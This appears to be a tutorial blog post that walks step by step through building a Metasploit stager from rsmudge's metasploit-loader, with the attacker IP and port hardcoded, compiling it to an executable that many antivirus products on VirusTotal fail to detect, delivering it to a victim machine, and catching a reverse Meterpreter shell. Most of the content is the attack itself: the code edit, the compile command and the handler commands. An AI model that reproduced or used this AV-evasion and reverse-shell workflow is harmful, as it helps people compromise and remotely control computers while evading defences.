Bypassing AV through Metasploit Loader 32-Bit

Bypassing AntiViruses in VirusTotal, through generating a payload using Metasploit Loader 32-Bit.

Metasploit-Loader is a quick stager client, written in C programming language (easy to understand) compatible with the Metasploit Framework, created by Raphael Mudge (rsmudge).

Metasploit-Loader will connect with the Metasploit, fetch the DLL, will load it in Memory & pass the control back to us.

STEPS:

1. Download & Save Metasploit-Loader:

GitHub Metasploit-Loader

Use Link: Metasploit-Loader
Use Commands: git clone https://github.com/rsmudge/metasploit-loader.git

Clone Metasploit-Loader

Install Metasploit-Loader:

Open src folder

2. Edit the Main.c file:

Make changes in the main.c > int main file in metasploit-loader/master/src/main.c as shown in figure below:

Main.c file

In main.c:

if (argc != 3) {
printf(“%s [host] [port]\n”, argv[0]);
exit(1);
}

/* connect to the handler */
SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));

Replace the above line of codes with below:

/* connect to the handler */
SOCKET my_socket = wsconnect(“192.168.137.128”, 9500));

Save the file main.c.
Here, attacker’s IP & Port is 192.168.137.128 & 9500.

3. Generating exe file by Compiling main.c with a MinGW compiler:

MinGW compiler

Use Commands: i686-w64-mingw32-gcc main.c -o loadmeta.exe -lws2_32

To compile main.c & generate an executable file loadmeta.exe.
Transfer the exe file to the victim’s machine (Windows 7)

4. Test the Executable against the AntiVirus:

You can verify the Payload against the AntiViruses, that file goes undetected.
If you scan the executable file over VirusTotal it goes undetected for many of the AntiVirus, like- AVG, Avast, PaloAlto, Tencent, Malware Bytes, Alibaba, Cat-QuickHeal, etc,.

VirusTotal

Payload goes undetected

5. Transfer Payload to Victim’s Machine:

Transfer the exe file to the victim’s machine (Windows 7)

Transfer payload to victims’

Here, we are using a Simple Python HTTP Server to transfer the Executable file to Victim’s Machine, which will act as a Reverse_Payload & connect back to the attacker’s Machine (Kali).

Use Commands: python -m SimpleHTTPServer

Python Server

6. Start Multi Handler:

Start a multi handler on the Attacker’s Machine that will connect back to the reverse_tcp meterpreter, coming from the Victim.

Revere TCP Handler

Use Commands:
> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.137.128
> set LPORT 9500
> exploit

7. Download & Run the Payload:

Connect to the HTTP Server with the victim’s machine. Download & Run the Executable file.

Payload is downloaded

Also, Windows 7 AntiVirus shows no warning against the Payload — loadmeta.exe.

Run the executable file:

Victim/Attacker executes payload

8. Reverse_Shell at Attacker’s Machine:

Now, check the Handler, a reverse meterpreter shell session has been created by the Metasploit-Loader, from the Victim’s Machine.

Meterpreter Session

Use Commands: getuid // to verify the source.

In the next session: Bypassing AV through Metasploit Loader 64-Bit

References:
1. Metasploit-Loader
2. MinGw Complier
3. VirusTotal

Thanks!👾